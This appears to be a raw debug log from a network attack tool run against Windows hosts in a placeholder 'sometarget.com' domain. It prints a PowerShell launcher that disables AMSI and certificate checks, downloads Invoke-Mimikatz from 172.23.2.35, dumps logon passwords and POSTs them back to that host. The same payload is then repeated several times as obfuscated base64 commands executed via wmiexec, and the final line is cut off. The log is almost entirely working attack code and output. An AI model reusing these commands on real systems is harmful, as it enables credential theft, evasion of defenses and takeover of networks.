DEBUG StringBinding chosen: ncacn_ip_tcp:TLCANISTER.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB CDC01.sometarget.com 445 CDC01 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is CDC01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDC01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDC01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDC01.sometarget.com[49154] | |
DEBUG Target system is CDRDC01.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\CDRDC01[\\PIPE\\atsvc] | |
DEBUG StringBinding: CDRDC01[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:CDRDC01.sometarget.com[49154] | |
MIMIKATZ CDC02.sometarget.com 445 CDC02 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Pw -;sv Lt ec;sv LK ((gv Pw).value.toString()+(gv Lt).value.toString());powershell (gv LK).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ ACDRTSM1.sometarget.com 445 ACDRTSM1 [+] Executed launcher | |
MIMIKATZ SRV2.sometarget.com 445 SRV2 [+] Executed launcher | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv Yz -;sv FG ec;sv ye ((gv Yz).value.toString()+(gv FG).value.toString());powershell (gv ye).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv FA -;sv zp ec;sv tx ((gv FA).value.toString()+(gv zp).value.toString());powershell (gv tx).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzA